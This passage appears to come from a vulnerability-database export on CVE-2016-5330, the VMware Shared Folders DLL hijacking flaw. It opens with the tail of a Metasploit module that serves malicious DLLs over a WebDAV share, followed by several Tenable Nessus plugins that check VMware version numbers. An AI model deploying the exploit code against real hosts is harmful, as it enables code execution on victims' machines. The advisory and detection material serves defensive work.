%H:%M:%S GMT\") \nend \n \ndef gen_datestamp(ttype=nil) \n::Time.now.strftime(\"%Y-%m-%dT%H:%M:%SZ\") \nend \n \n# This method rejects requests that are known to break exploitation \ndef blacklisted_path?(uri) \nreturn true if uri =~ /\\.exe/i \nreturn true if uri =~ /\\.(config|manifest)/i \nreturn true if uri =~ /desktop\\.ini/i \nreturn true if uri =~ /lib.*\\.dll/i \nreturn true if uri =~ /\\.tmp$/i \nreturn true if uri =~ /(pcap|packet)\\.dll/i \nfalse \nend \n \ndef exploit \n \nmyhost = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] \n \n@exploit_unc = \"\\\\\\\\#{myhost}\\\\\" \n \nif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' \nfail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/') \nend \n \nprint_status(\"Files are available at #{@exploit_unc}#{datastore['SHARENAME']}\") \n \nsuper \nend \nend \n`\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/138289/vmhgfs_webdav_dll_sideload.rb.txt"}], "nessus": [{"lastseen": "2021-01-01T07:00:24", "description": "The version of VMware Workstation installed on the remote host is\n12.1.x prior to 12.1.1. It is, therefore, affected by an arbitrary\ncode execution vulnerability in the Shared Folders (HGFS) feature due\nto improper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. 
A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "VMware Workstation 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:workstation"], "id": "VMWARE_WORKSTATION_WIN_VMSA_2016_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/92947", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92947);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_xref(name:\"VMSA\", value:\"2016-0010\");\n\n script_name(english:\"VMware Workstation 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010)\");\n script_summary(english:\"Checks the VMware Workstation version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization application installed on the remote host is affected\nby an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workstation installed on the remote host is\n12.1.x prior to 12.1.1. It is, therefore, affected by an arbitrary\ncode execution vulnerability in the Shared Folders (HGFS) feature due\nto improper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. 
A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Workstation 12.1.1 or later.\n\nNote that VMware Tools on Windows-based guests that use the Shared\nFolders (HGFS) feature must also be updated to completely mitigate the\nvulnerability.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5330\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workstation\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workstation_detect.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/VMware Workstation\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nappname = 'VMware Workstation';\n\ninstall = get_single_install(app_name:appname, exit_if_unknown_ver:TRUE);\nversion = install['version'];\npath = install['path'];\n\nfix = '';\nif (version =~ \"^12\\.1\\.\") fix = \"12.1.1\";\n\nif (!empty(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T07:00:06", "description": "The version of VMware Player installed on the remote host is 12.1.x\nprior to 12.1.1. It is, therefore, affected by an arbitrary code\nexecution vulnerability in the Shared Folders (HGFS) feature due to\nimproper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. 
A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "VMware Player 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010) (Linux)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:player"], "id": "VMWARE_PLAYER_LINUX_VMSA_2016_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/92944", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92944);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_xref(name:\"VMSA\", value:\"2016-0010\");\n\n script_name(english:\"VMware Player 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010) (Linux)\");\n script_summary(english:\"Checks the VMware Player version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization application installed on the remote host is affected\nby an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Player installed on the remote host is 12.1.x\nprior to 12.1.1. It is, therefore, affected by an arbitrary code\nexecution vulnerability in the Shared Folders (HGFS) feature due to\nimproper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. 
A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Player 12.1.1 or later.\n\nNote that VMware Tools on Windows-based guests that use the Shared\nFolders (HGFS) feature must also be updated to completely mitigate the\nvulnerability.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5330\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_player_linux_installed.nbin\");\n script_require_keys(\"Host/VMware Player/Version\");\n script_exclude_keys(\"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (get_kb_item(\"SMB/Registry/Enumerated\")) audit(AUDIT_OS_NOT, \"Linux\", \"Windows\");\n\nversion = get_kb_item_or_exit(\"Host/VMware Player/Version\");\n\nfix = '';\nif (version =~ \"^12\\.1\\.\") fix = '12.1.1';\n\nif (!empty(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report +=\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:0, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware Player\", version);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T07:00:06", "description": "The version of VMware Player installed on the remote host is 12.1.x\nprior to 12.1.1. It is, therefore, affected by an arbitrary code\nexecution vulnerability in the Shared Folders (HGFS) feature due to\nimproper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. 
A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "VMware Player 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:player"], "id": "VMWARE_PLAYER_WIN_VMSA_2016_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/92945", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92945);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_xref(name:\"VMSA\", value:\"2016-0010\");\n\n script_name(english:\"VMware Player 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010)\");\n script_summary(english:\"Checks the VMware Player version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization application installed on the remote host is affected\nby an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Player installed on the remote host is 12.1.x\nprior to 12.1.1. It is, therefore, affected by an arbitrary code\nexecution vulnerability in the Shared Folders (HGFS) feature due to\nimproper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. 
A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Player 12.1.1 or later.\n\nNote that VMware Tools on Windows-based guests that use the Shared\nFolders (HGFS) feature must also be updated to completely mitigate the\nvulnerability.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5330\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_player_detect.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/VMware Player\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\ninstall = get_single_install(app_name:\"VMware Player\", exit_if_unknown_ver:TRUE);\nversion = install['version'];\npath = install['path'];\n\nfix = '';\nif (version =~ \"^12\\.1\\.\") fix = '12.1.1';\n\nif (!empty(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"VMware Player\", version, path);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:30:03", "description": "The version of VMware Fusion installed on the remote Mac OS X host is\n8.1.x prior to 8.1.1. It is, therefore, affected by an arbitrary code\nexecution vulnerability in the Shared Folders (HGFS) feature due to\nimproper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. 
A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.", "edition": 26, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "VMware Fusion 8.1.x < 8.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:fusion"], "id": "MACOSX_FUSION_VMSA_2016_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/92943", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92943);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_xref(name:\"VMSA\", value:\"2016-0010\");\n\n script_name(english:\"VMware Fusion 8.1.x < 8.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010)\");\n script_summary(english:\"Checks Fusion version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization application installed on the remote Mac OS X host is\naffected by an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Fusion installed on the remote Mac OS X host is\n8.1.x prior to 8.1.1. It is, therefore, affected by an arbitrary code\nexecution vulnerability in the Shared Folders (HGFS) feature due to\nimproper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. 
A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Fusion 8.1.1 or later.\n\nNote that VMware Tools on Windows-based guests that use the Shared\nFolders (HGFS) feature must also be updated to completely mitigate the\nvulnerability.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5330\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:fusion\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_fusion_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"installed_sw/VMware Fusion\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\ninstall = get_single_install(app_name:\"VMware Fusion\", exit_if_unknown_ver:TRUE);\nversion = install['version'];\npath = install['path'];\n\nfix = '';\nif (version =~ \"^8\\.1\\.\") fix = '8.1.1';\n\nif (!empty(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:0, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"VMware Fusion\", version, path);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-22T10:55:14", "description": "The version of VMware Workstation installed on the remote host is\n12.1.x prior to 12.1.1. It is, therefore, affected by an arbitrary\ncode execution vulnerability in the Shared Folders (HGFS) feature due\nto improper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. 
A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.", "edition": 22, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "VMware Workstation 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010) (Linux)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "modified": "2016-08-12T00:00:00", "cpe": ["cpe:/a:vmware:workstation"], "id": "VMWARE_WORKSTATION_LINUX_VMSA_2016_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/92946", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92946);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/21\");\n\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_xref(name:\"VMSA\", value:\"2016-0010\");\n\n script_name(english:\"VMware Workstation 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010) (Linux)\");\n script_summary(english:\"Checks VMware Workstation version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization application installed on the remote host is affected\nby an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workstation installed on the remote host is\n12.1.x prior to 12.1.1. It is, therefore, affected by an arbitrary\ncode execution vulnerability in the Shared Folders (HGFS) feature due\nto improper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. 
A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Workstation 12.1.1 or later.\n\nNote that VMware Tools on Windows-based guests that use the Shared\nFolders (HGFS) feature must also be updated to completely mitigate the\nvulnerability.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5330\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workstation\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 
2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workstation_linux_installed.nbin\");\n script_require_keys(\"Host/VMware Workstation/Version\");\n script_exclude_keys(\"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (get_kb_item(\"SMB/Registry/Enumerated\")) audit(AUDIT_OS_NOT, \"Linux\", \"Windows\");\n\nversion = get_kb_item_or_exit(\"Host/VMware Workstation/Version\");\n\nfix = '';\nif (version =~ \"^12\\.1\\.\") fix = '12.1.1';\n\nif (!empty(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report +=\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:0, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware Workstation\", version);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T15:21:40", "description": "The remote VMware ESXi host is version 5.0, 5.1, 5.5, or 6.0 and is\nmissing a security patch. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists in the\n Shared Folders (HGFS) feature due to improper loading of\n Dynamic-link library (DLL) files from insecure paths,\n including the current working directory, which may not\n be under user control. A remote attacker can exploit\n this vulnerability, by placing a malicious DLL in the\n path or by convincing a user into opening a file on a\n network share, to inject and execute arbitrary code in\n the context of the current user. (CVE-2016-5330)\n\n - An HTTP header injection vulnerability exists due to\n improper sanitization of user-supplied input. 
A remote\n attacker can exploit this to inject arbitrary HTTP\n headers and conduct HTTP response splitting attacks.\n (CVE-2016-5331)", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "ESXi 5.0 / 5.1 / 5.5 / 6.0 Multiple Vulnerabilities (VMSA-2016-0010) (remote check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5331", "CVE-2016-5330"], "modified": "2016-08-12T00:00:00", "cpe": ["cpe:/o:vmware:esxi"], "id": "VMWARE_VMSA-2016-0010_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/92949", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92949);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-5330\", \"CVE-2016-5331\");\n script_bugtraq_id(92323, 92324);\n script_xref(name:\"VMSA\", value:\"2016-0010\");\n\n script_name(english:\"ESXi 5.0 / 5.1 / 5.5 / 6.0 Multiple Vulnerabilities (VMSA-2016-0010) (remote check)\");\n script_summary(english:\"Checks the ESXi version and build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESXi host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESXi host is version 5.0, 5.1, 5.5, or 6.0 and is\nmissing a security patch. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists in the\n Shared Folders (HGFS) feature due to improper loading of\n Dynamic-link library (DLL) files from insecure paths,\n including the current working directory, which may not\n be under user control. 
A remote attacker can exploit\n this vulnerability, by placing a malicious DLL in the\n path or by convincing a user into opening a file on a\n network share, to inject and execute arbitrary code in\n the context of the current user. (CVE-2016-5330)\n\n - An HTTP header injection vulnerability exists due to\n improper sanitization of user-supplied input. A remote\n attacker can exploit this to inject arbitrary HTTP\n headers and conduct HTTP response splitting attacks.\n (CVE-2016-5331)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2142193\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2143976\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2141429\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144359\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch as referenced in the vendor advisory.\n\nNote that VMware Tools on Windows-based guests that use the Shared\nFolders (HGFS) feature must also be updated to completely 